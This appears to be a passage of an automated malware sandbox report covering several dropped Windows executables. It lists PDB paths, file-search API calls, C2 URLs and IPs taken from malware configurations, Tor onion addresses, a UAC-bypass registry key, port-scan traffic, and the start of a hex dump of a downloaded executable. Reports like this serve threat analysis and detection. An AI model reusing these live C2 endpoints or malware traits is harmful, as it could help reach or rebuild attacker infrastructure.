Source:	Binary string: The symbol server has never indexed any version of this symbol fileNo version of the .pdb file with the given name has ever been registered. source: 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2567693218.0000000000ACD000.00000040.00000001.01000000.0000000D.sdmp, 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2724435477.000000000355C000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: mentorship_and_software_support.pdb source: 4854.exe, 00000004.00000000.1898749556.0000000000C41000.00000002.00000001.01000000.00000006.sdmp
Source:	Binary string: kernelbase.pdbUGP source: dialer.exe, 00000022.00000003.2224899162.00000162B30E0000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\dll\System.ServiceModel.pdb source: RegSvcs.exe, 00000008.00000002.3078495334.0000000000E65000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\vbox\branch\w64-1.6\out\win.amd64\release\obj\src\VBox\HostDrivers\VBoxDrv\VBoxDrv.pdb source: 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000003.2066199382.0000000003BC2000.00000004.00001000.00020000.00000000.sdmp, 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2724435477.00000000032D3000.00000040.00001000.00020000.00000000.sdmp, 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2567693218.0000000000843000.00000040.00000001.01000000.0000000D.sdmp
Source:	Binary string: Drive not readyThis error indicates a .pdb file related failure. source: 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2567693218.0000000000ACD000.00000040.00000001.01000000.0000000D.sdmp, 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2724435477.000000000355C000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: c:\Users\Admin\documents\visual studio 2015\Projects\Winmon\x64\Release\Winmon.pdb source: 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000003.2066199382.0000000003BC2000.00000004.00001000.00020000.00000000.sdmp, 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2724435477.00000000032D3000.00000040.00001000.00020000.00000000.sdmp, 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2567693218.0000000000843000.00000040.00000001.01000000.0000000D.sdmp
Source:	Binary string: zzz_AsmCodeRange_*FrameDatainvalid string positionstring too long.pdb source: 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2567693218.0000000000ACD000.00000040.00000001.01000000.0000000D.sdmp, 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2724435477.000000000355C000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: Pdb read access deniedYou may be attempting to access a .pdb file with read-only attributes source: 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2567693218.0000000000ACD000.00000040.00000001.01000000.0000000D.sdmp, 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2724435477.000000000355C000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: Unable to locate the .pdb file in this location source: 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2567693218.0000000000ACD000.00000040.00000001.01000000.0000000D.sdmp, 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2724435477.000000000355C000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: The module signature does not match with .pdb signature. source: 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2567693218.0000000000ACD000.00000040.00000001.01000000.0000000D.sdmp, 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2724435477.000000000355C000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: .pdb.dbg source: 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2567693218.0000000000ACD000.00000040.00000001.01000000.0000000D.sdmp, 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2724435477.000000000355C000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: '(EfiGuardDxe.pdbx source: 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2567693218.0000000000ACD000.00000040.00000001.01000000.0000000D.sdmp, 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2724435477.000000000355C000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: ntdll.pdb source: dialer.exe, 00000022.00000003.2208403295.00000162B30E0000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: C:\Users\admin\source\repos\driver-process-monitor-master\Release\WinmonProcessMonitor.pdb source: 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000003.2066199382.0000000003BC2000.00000004.00001000.00020000.00000000.sdmp, 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2724435477.00000000032D3000.00000040.00001000.00020000.00000000.sdmp, 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2567693218.0000000000843000.00000040.00000001.01000000.0000000D.sdmp
Source:	Binary string: or you do not have access permission to the .pdb location. source: 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2567693218.0000000000ACD000.00000040.00000001.01000000.0000000D.sdmp, 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2724435477.000000000355C000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: An Exception happened while downloading the module .pdbPlease open a bug if this is a consistent repro. source: 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2567693218.0000000000ACD000.00000040.00000001.01000000.0000000D.sdmp, 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2724435477.000000000355C000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: Serialize.pdb source: 88D9.exe, 00000013.00000000.2063363979.0000000000AE2000.00000002.00000001.01000000.00000010.sdmp
Source:	Binary string: c:\MyProjects\gitlab\ILProtector\ILProtector\Output2010\x64\Release\Protect64.pdb source: 4854.exe, 00000004.00000002.1911380987.00000000049FC000.00000004.00000800.00020000.00000000.sdmp, 4854.exe, 00000004.00000002.1911380987.0000000004871000.00000004.00000800.00020000.00000000.sdmp, 928F.exe, 0000001C.00000002.2549281666.0000000006F66000.00000004.00000800.00020000.00000000.sdmp, 928F.exe, 0000001C.00000002.2549281666.00000000070F1000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: kernelbase.pdb source: dialer.exe, 00000022.00000003.2224899162.00000162B30E0000.00000004.00000001.00020000.00000000.sdmp

Source: C:\Users\user\AppData\Local\Temp\InstallSetup8.exe	Code function: 10_2_00405C63 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,	10_2_00405C63
Source: C:\Users\user\AppData\Local\Temp\InstallSetup8.exe	Code function: 10_2_00402910 FindFirstFileW,	10_2_00402910
Source: C:\Users\user\AppData\Local\Temp\InstallSetup8.exe	Code function: 10_2_004068B4 FindFirstFileW,FindClose,	10_2_004068B4
Source: C:\Users\user\AppData\Local\Temp\InstallSetup8.exe	Code function: 13_2_00405C63 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,	13_2_00405C63
Source: C:\Users\user\AppData\Local\Temp\InstallSetup8.exe	Code function: 13_2_004068B4 FindFirstFileW,FindClose,	13_2_004068B4
Source: C:\Users\user\AppData\Local\Temp\InstallSetup8.exe	Code function: 13_2_00402910 FindFirstFileW,	13_2_00402910
Source: C:\Users\user\AppData\Local\Temp\etopt.exe	Code function: 21_2_004065CA FindFirstFileA,FindClose,	21_2_004065CA
Source: C:\Users\user\AppData\Local\Temp\etopt.exe	Code function: 21_2_004059F9 GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,	21_2_004059F9
Source: C:\Users\user\AppData\Local\Temp\etopt.exe	Code function: 21_2_004027AF FindFirstFileA,	21_2_004027AF
Source: C:\Users\user\AppData\Local\Temp\is-U9MHE.tmp\tuc4.tmp	Code function: 23_2_00474060 FindFirstFileA,FindNextFileA,FindClose,	23_2_00474060
Source: C:\Users\user\AppData\Local\Temp\is-U9MHE.tmp\tuc4.tmp	Code function: 23_2_004520C0 FindFirstFileA,GetLastError,	23_2_004520C0
Source: C:\Users\user\AppData\Local\Temp\is-U9MHE.tmp\tuc4.tmp	Code function: 23_2_004966E4 FindFirstFileA,SetFileAttributesA,FindNextFileA,FindClose,	23_2_004966E4
Source: C:\Users\user\AppData\Local\Temp\is-U9MHE.tmp\tuc4.tmp	Code function: 23_2_004634F4 SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode,	23_2_004634F4
Source: C:\Users\user\AppData\Local\Temp\is-U9MHE.tmp\tuc4.tmp	Code function: 23_2_00463970 SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode,	23_2_00463970
Source: C:\Users\user\AppData\Local\Temp\is-U9MHE.tmp\tuc4.tmp	Code function: 23_2_00461F68 FindFirstFileA,FindNextFileA,FindClose,	23_2_00461F68

Source: C:\Users\user\AppData\Local\Temp\nsa984B.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\
Source: C:\Users\user\AppData\Local\Temp\nsa984B.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\
Source: C:\Users\user\AppData\Local\Temp\nsa984B.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\
Source: C:\Users\user\AppData\Local\Temp\nsa984B.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\
Source: C:\Users\user\AppData\Local\Temp\nsa984B.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\
Source: C:\Users\user\AppData\Local\Temp\nsa984B.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\

Networking

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\explorer.exe	Network Connect: 185.215.113.68 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 5.42.65.125 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 54.231.140.225 443	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 104.192.141.1 443	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 158.160.130.138 80	Jump to behavior

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: http://5.42.66.58/3886d2276f6914c4.php
Source: Malware configuration extractor	URLs: soupinterestoe.fund
Source: Malware configuration extractor	URLs: dayfarrichjwclik.fun
Source: Malware configuration extractor	URLs: neighborhoodfeelsa.fun
Source: Malware configuration extractor	URLs: ratefacilityframw.fun
Source: Malware configuration extractor	URLs: reviveincapablewew.pw
Source: Malware configuration extractor	URLs: cakecoldsplurgrewe.pw
Source: Malware configuration extractor	URLs: opposesicknessopw.pw
Source: Malware configuration extractor	URLs: politefrightenpowoa.pw
Source: Malware configuration extractor	URLs: http://185.215.113.68/fks/index.php
Source: Malware configuration extractor	URLs: http://185.215.113.68/fks/index.php
Source: Malware configuration extractor	URLs: 195.20.16.103:18305

Connects to many ports of the same IP (likely port scanning)

Source: global traffic	TCP traffic: 5.42.65.31 ports 3,4,6,8,9,48396
Source: global traffic	TCP traffic: 195.20.16.103 ports 0,1,3,5,8,18305

Found Tor onion address

Source: 31839b57a4f11171d6abc8bbc4451ee4.exe	String found in binary or memory: s25519: internal error: setShortBytes called with a long stringhttp2: Transport closing idle conn %p (forSingleUse=%v, maxStream=%v)http://vcr4vuv4sf5233btfy7xboezl7umjw7rljdmaeztmmf4s6k2ivinj3yd.oniontls: handshake message of length %d bytes exceeds maximum o
Source: 31839b57a4f11171d6abc8bbc4451ee4.exe	String found in binary or memory: nvalid checksumheadTailIndex overflowheader field %q = %q%shide process ID %d: %whpack: string too longhsmiths4fyqlw5xw.onionhsmiths5mjk6uijs.onionhttp2: frame too largehttp://localhost:3433/https://duniadekho.baridna: invalid label %qinappropriate fallbackint
Source: 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2778323463.000000000C0AE000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://petas4zb2nd4xmyo2bozkq3g7y2grljlf5sqxwsm5khywam6sierhxad.onion
Source: 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2778323463.000000000C0AE000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: !This program cannoHKEY_USERS\S-1-5-21-2246122658-3693405117-2476756634-1002\Software\Microsoft\TestAppHKEY_USERS\S-1-5-21-2246122658-3693405117-2476756634-1002\Software\Microsoft\ec18cc80https://statscreate.orghttp://petas4zb2nd4xmyo2bozkq3g7y2grljlf5sqxwsm5khywam6sierhxad.onionhttps://statscreate.orghttp://petas4zb2nd4xmyo2bozkq3g7y2grljlf5sqxwsm5khywam6sierhxad.onionSELECT Caption FROM Win32_OperatingSystemMicrosoft Windows 10 ProSELECT displayName FROM AntiVirusProductW. Europe Standard Time
Source: 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000003.2066199382.0000000003780000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: Nyiakeng_Puachue_HmongPakistan Standard TimeParaguay Standard TimeRoGetActivationFactoryRtlDeleteFunctionTableRtlGetNtVersionNumbersSafeArrayGetRecordInfoSafeArraySetRecordInfoSakhalin Standard TimeSao Tome Standard TimeSeImpersonatePrivilegeSetupDiEnumDriverInfoWSetupDiGetClassDevsExWTasmania Standard TimeTor bootstrap progressTor service is runningUnsupported Media TypeWSAGetOverlappedResultWSALookupServiceBeginWWaitForMultipleObjectsWget/1.12 (freebsd8.1)Xenu Link Sleuth/1.3.8access-control-max-ageaddress already in useadvapi32.dll not foundargument list too longassembly checks failedbad g->status in readybad sweepgen in refillbitcoin3nqy3db7c.onionbody closed by handlercannot allocate memoryclient not initializedcompileCallabck: type couldn't create devicecouldn't get file infocouldn't start servicecoulnd't write to filecreate main window: %wdecode and decrypt: %wdriver: bad connectionduplicated defer entryelectrum.leblancnet.uselectrum3.hodlister.coelectrum5.hodlister.coelectrumxhqdsmlu.onionencrypt and encode: %werror decoding messageerror parsing regexp: failed to get UUID: %wfailed to hide app: %wfailed to open key: %wfailed to open src: %wfailed to register: %wfailed to set UUID: %wframe_data_pad_too_bigfreeIndex is not validgenerate challenge: %wgetenv before env initgzip: invalid checksumheadTailIndex overflowheader field %q = %q%shide process ID %d: %whpack: string too longhsmiths4fyqlw5xw.onionhsmiths5mjk6uijs.onionhttp2: frame too largehttp://localhost:3433/https://duniadekho.baridna: invalid label %qinappropriate fallbackinteger divide by zerointegrity check failedinterface conversion: internal inconsistencyinvalid Trailer key %qinvalid address familyinvalid number base %djson: unknown field %qkernel32.dll not foundmalformed HTTP versionminpc or maxpc invalidmissing ']' in addressmultiple :: in addressndndword5lpb7eex.onionnetwork is unreachableno connection providednon-Go function at pc=oldoverflow is not niloperation was canceledoverflowing coordinateozahtqwp25chjdjd.onionprotocol not availableprotocol not supportedqtornadoklbgdyww.onionread response body: %wreflect.Value.MapIndexreflect.Value.SetFloatreflectlite.Value.Elemreflectlite.Value.Typeremote address changedruntime.main not on m0runtime: work.nwait = runtime:scanstack: gp=s.freeindex > s.nelemss7clinmo4cazmhul.onionscanstack - bad statussecure boot is enabledsend on closed channelserver.peers.subscribeservice does not existservice is not runningset Tor mode to %s: %wskipping Question Nameskipping Question Typespan has no free spacesql: no Rows availablestack not a power of 2status/bootstrap-phasetrace reader (blocked)trace: alloc too largetransaction is stoppedtransaction not existsunexpected length codeunexpected method stepwirep: invalid p statewrite on closed bufferx509: malformed issuerzero length BIT STRINGzlib: invalid checksum into Go value of type ) must be a power of 2
Source: 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2567693218.0000000000400000.00000040.00000001.01000000.0000000D.sdmp	String found in binary or memory: Nyiakeng_Puachue_HmongPakistan Standard TimeParaguay Standard TimeRoGetActivationFactoryRtlDeleteFunctionTableRtlGetNtVersionNumbersSafeArrayGetRecordInfoSafeArraySetRecordInfoSakhalin Standard TimeSao Tome Standard TimeSeImpersonatePrivilegeSetupDiEnumDriverInfoWSetupDiGetClassDevsExWTasmania Standard TimeTor bootstrap progressTor service is runningUnsupported Media TypeWSAGetOverlappedResultWSALookupServiceBeginWWaitForMultipleObjectsWget/1.12 (freebsd8.1)Xenu Link Sleuth/1.3.8access-control-max-ageaddress already in useadvapi32.dll not foundargument list too longassembly checks failedbad g->status in readybad sweepgen in refillbitcoin3nqy3db7c.onionbody closed by handlercannot allocate memoryclient not initializedcompileCallabck: type couldn't create devicecouldn't get file infocouldn't start servicecoulnd't write to filecreate main window: %wdecode and decrypt: %wdriver: bad connectionduplicated defer entryelectrum.leblancnet.uselectrum3.hodlister.coelectrum5.hodlister.coelectrumxhqdsmlu.onionencrypt and encode: %werror decoding messageerror parsing regexp: failed to get UUID: %wfailed to hide app: %wfailed to open key: %wfailed to open src: %wfailed to register: %wfailed to set UUID: %wframe_data_pad_too_bigfreeIndex is not validgenerate challenge: %wgetenv before env initgzip: invalid checksumheadTailIndex overflowheader field %q = %q%shide process ID %d: %whpack: string too longhsmiths4fyqlw5xw.onionhsmiths5mjk6uijs.onionhttp2: frame too largehttp://localhost:3433/https://duniadekho.baridna: invalid label %qinappropriate fallbackinteger divide by zerointegrity check failedinterface conversion: internal inconsistencyinvalid Trailer key %qinvalid address familyinvalid number base %djson: unknown field %qkernel32.dll not foundmalformed HTTP versionminpc or maxpc invalidmissing ']' in addressmultiple :: in addressndndword5lpb7eex.onionnetwork is unreachableno connection providednon-Go function at pc=oldoverflow is not niloperation was canceledoverflowing coordinateozahtqwp25chjdjd.onionprotocol not availableprotocol not supportedqtornadoklbgdyww.onionread response body: %wreflect.Value.MapIndexreflect.Value.SetFloatreflectlite.Value.Elemreflectlite.Value.Typeremote address changedruntime.main not on m0runtime: work.nwait = runtime:scanstack: gp=s.freeindex > s.nelemss7clinmo4cazmhul.onionscanstack - bad statussecure boot is enabledsend on closed channelserver.peers.subscribeservice does not existservice is not runningset Tor mode to %s: %wskipping Question Nameskipping Question Typespan has no free spacesql: no Rows availablestack not a power of 2status/bootstrap-phasetrace reader (blocked)trace: alloc too largetransaction is stoppedtransaction not existsunexpected length codeunexpected method stepwirep: invalid p statewrite on closed bufferx509: malformed issuerzero length BIT STRINGzlib: invalid checksum into Go value of type ) must be a power of 2
Source: 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2778323463.000000000C0EE000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://statscreate.orghttp://petas4zb2nd4xmyo2bozkq3g7y2grljlf5sqxwsm5khywam6sierhxad.onionSoftware\Classes\ms-settings\shell\open\commandSoftware\Classes\ms-settings\shell\open\command
Source: 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2724435477.0000000002E90000.00000040.00001000.00020000.00000000.sdmp	String found in binary or memory: Nyiakeng_Puachue_HmongPakistan Standard TimeParaguay Standard TimeRoGetActivationFactoryRtlDeleteFunctionTableRtlGetNtVersionNumbersSafeArrayGetRecordInfoSafeArraySetRecordInfoSakhalin Standard TimeSao Tome Standard TimeSeImpersonatePrivilegeSetupDiEnumDriverInfoWSetupDiGetClassDevsExWTasmania Standard TimeTor bootstrap progressTor service is runningUnsupported Media TypeWSAGetOverlappedResultWSALookupServiceBeginWWaitForMultipleObjectsWget/1.12 (freebsd8.1)Xenu Link Sleuth/1.3.8access-control-max-ageaddress already in useadvapi32.dll not foundargument list too longassembly checks failedbad g->status in readybad sweepgen in refillbitcoin3nqy3db7c.onionbody closed by handlercannot allocate memoryclient not initializedcompileCallabck: type couldn't create devicecouldn't get file infocouldn't start servicecoulnd't write to filecreate main window: %wdecode and decrypt: %wdriver: bad connectionduplicated defer entryelectrum.leblancnet.uselectrum3.hodlister.coelectrum5.hodlister.coelectrumxhqdsmlu.onionencrypt and encode: %werror decoding messageerror parsing regexp: failed to get UUID: %wfailed to hide app: %wfailed to open key: %wfailed to open src: %wfailed to register: %wfailed to set UUID: %wframe_data_pad_too_bigfreeIndex is not validgenerate challenge: %wgetenv before env initgzip: invalid checksumheadTailIndex overflowheader field %q = %q%shide process ID %d: %whpack: string too longhsmiths4fyqlw5xw.onionhsmiths5mjk6uijs.onionhttp2: frame too largehttp://localhost:3433/https://duniadekho.baridna: invalid label %qinappropriate fallbackinteger divide by zerointegrity check failedinterface conversion: internal inconsistencyinvalid Trailer key %qinvalid address familyinvalid number base %djson: unknown field %qkernel32.dll not foundmalformed HTTP versionminpc or maxpc invalidmissing ']' in addressmultiple :: in addressndndword5lpb7eex.onionnetwork is unreachableno connection providednon-Go function at pc=oldoverflow is not niloperation was canceledoverflowing coordinateozahtqwp25chjdjd.onionprotocol not availableprotocol not supportedqtornadoklbgdyww.onionread response body: %wreflect.Value.MapIndexreflect.Value.SetFloatreflectlite.Value.Elemreflectlite.Value.Typeremote address changedruntime.main not on m0runtime: work.nwait = runtime:scanstack: gp=s.freeindex > s.nelemss7clinmo4cazmhul.onionscanstack - bad statussecure boot is enabledsend on closed channelserver.peers.subscribeservice does not existservice is not runningset Tor mode to %s: %wskipping Question Nameskipping Question Typespan has no free spacesql: no Rows availablestack not a power of 2status/bootstrap-phasetrace reader (blocked)trace: alloc too largetransaction is stoppedtransaction not existsunexpected length codeunexpected method stepwirep: invalid p statewrite on closed bufferx509: malformed issuerzero length BIT STRINGzlib: invalid checksum into Go value of type ) must be a power of 2
Source: 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2778323463.000000000C0A0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://petas4zb2nd4xmyo2bozkq3g7y2grljlf5sqxwsm5khywam6sierhxad.onion
Source: 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2778323463.000000000C0A0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: =$T%SE'@2=(31230d161c143d24542553452740323d28http://petas4zb2nd4xmyo2bozkq3g7y2grljlf5sqxwsm5khywam6sierhxad.onionhttp://petas4zb2nd4xmyo2bozkq3g7y2grljlf5sqxwsm5khywam6sierhxad.onionS-1-5-21-2246122658-3693405117-2476756634-1002\Software\Microsoft\TestAppS-1-5-21-2246122658-3693405117-2476756634-1002\Software\Microsoft\ec18cc80S-1-5-21-2246122658-3693405117-2476756634-1002\Software\Microsoft\ec18cc80S-1-5-21-2246122658-3693405117-2476756634-1002\Software\Microsoft\ec18cc80S-1-5-21-2246122658-3693405117-2476756634-1002\Software\Microsoft\ec18cc80S-1-5-21-2246122658-3693405117-2476756634-1002\Software\Microsoft\ec18cc80S-1-5-21-2246122658-3693405117-2476756634-1002\Software\Microsoft\ec18cc80S-1-5-21-2246122658-3693405117-2476756634-1002\Software\Microsoft\ec18cc80FirstInstallDateS-1-5-21-2246122658-3693405117-2476756634-1002\Software\Microsoft\ec18cc80FirstInstallDateS-1-5-21-2246122658-3693405117-2476756634-1002\Software\Microsoft\ec18cc80S-1-5-21-2246122658-3693405117-2476756634-1002\Software\Microsoft\ec18cc80S-1-5-21-2246122658-3693405117-2476756634-1002\Software\Microsoft\ec18cc80S-1-5-21-2246122658-3693405117-2476756634-1002\Software\Microsoft\ec18cc80S-1-5-21-2246122658-3693405117-2476756634-1002\Software\Microsoft\ec18cc80S-1-5-21-2246122658-3693405117-2476756634-1002\Software\Microsoft\ec18cc80S-1-5-21-2246122658-3693405117-2476756634-1002\Software\Microsoft\ec18cc80S-1-5-21-2246122658-3693405117-2476756634-1002\Software\Microsoft\ec18cc80S-1-5-21-2246122658-3693405117-2476756634-1002\Software\Microsoft\ec18cc80S-1-5-21-2246122658-3693405117-2476756634-1002\Software\Microsoft\ec18cc80S-1-5-21-2246122658-3693405117-2476756634-1002\Software\Microsoft\ec18cc80S-1-5-21-2246122658-3693405117-2476756634-1002\Software\Microsoft\ec18cc80S-1-5-21-2246122658-3693405117-2476756634-1002\Software\Microsoft\ec18cc80S-1-5-21-2246122658-3693405117-2476756634-1002\Software\Microsoft\ec18cc80S-1-5-21-2246122658-3693405117-2476756634-1002\Software\Microsoft\ec18cc80S-1-5-21-2246122658-3693405117-2476756634-1002\Software\Microsoft\ec18cc80S-1-5-21-2246122658-3693405117-2476756634-1002\Software\Microsoft\ec18cc80S-1-5-21-2246122658-3693405117-2476756634-1002\Software\Microsoft\ec18cc80S-1-5-21-2246122658-3693405117-2476756634-1002\Software\Microsoft\ec18cc80Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHzIntel(R) Core(TM)2 CPU 6600 @ 2.40 GHzS-1-5-21-2246122658-3693405117-2476756634-1002\Software\Microsoft\ec18cc80S-1-5-21-2246122658-3693405117-2476756634-1002\Software\Microsoft\ec18cc80SELECT Name FROM Win32_VideoControllerS-1-5-21-2246122658-3693405117-2476756634-1002\Software\Microsoft\ec18cc80c:\users\user\appdata\local\temp\31839b57a4f11171d6abc8bbc4451ee4.exe"C:\Users\user\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"
Source: 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2778323463.000000000C0EC000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://statscreate.orghttp://petas4zb2nd4xmyo2bozkq3g7y2grljlf5sqxwsm5khywam6sierhxad.onion

Uses ping.exe to check the status of other devices and networks

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\PING.EXE ping 1.1.1.1

Yara detected Generic Downloader

Source: Yara match	File source: 4.0.4854.exe.aa0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\4854.exe, type: DROPPED

Source: global traffic	TCP traffic: 192.168.2.4:49739 -> 195.20.16.103:18305
Source: global traffic	TCP traffic: 192.168.2.4:49801 -> 91.92.250.73:8524
Source: global traffic	TCP traffic: 192.168.2.4:49809 -> 185.196.9.220:7702
Source: global traffic	TCP traffic: 192.168.2.4:49810 -> 5.42.65.31:48396
Source: global traffic	TCP traffic: 192.168.2.4:49812 -> 45.42.45.36:45450
Source: global traffic	UDP traffic: 192.168.2.4:63292 -> 38.6.193.13:8889

Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Wed, 27 Dec 2023 17:12:22 GMTContent-Type: application/octet-streamContent-Length: 19755520Last-Modified: Sun, 24 Dec 2023 05:03:49 GMTConnection: keep-aliveETag: "6587bbb5-12d7200"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 b5 bb 87 65 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0b 00 00 68 2d 01 00 08 00 00 00 00 00 00 2e 86 2d 01 00 20 00 00 00 a0 2d 01 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 e0 2d 01 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 d8 85 2d 01 53 00 00 00 00 a0 2d 01 d8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 2d 01 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 34 66 2d 01 00 20 00 00 00 68 2d 01 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 d8 04 00 00 00 a0 2d 01 00 06 00 00 00 6a 2d 01 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 c0 2d 01 00 02 00 00 00 70 2d 01 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 86 2d 01 00 00 00 00 48 00 00 00 02 00 05 00 24 70 2d 01 b4 15 00 00 03 00 00 00 01 00 00 06 30 28 00 00 f2 47 2d 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 13 30 03 00 5f 01 00 00 01 00 00 11 7e 03 00 00 04 2c 0d 28 11 00 00 06 2c 06 16 28 0d 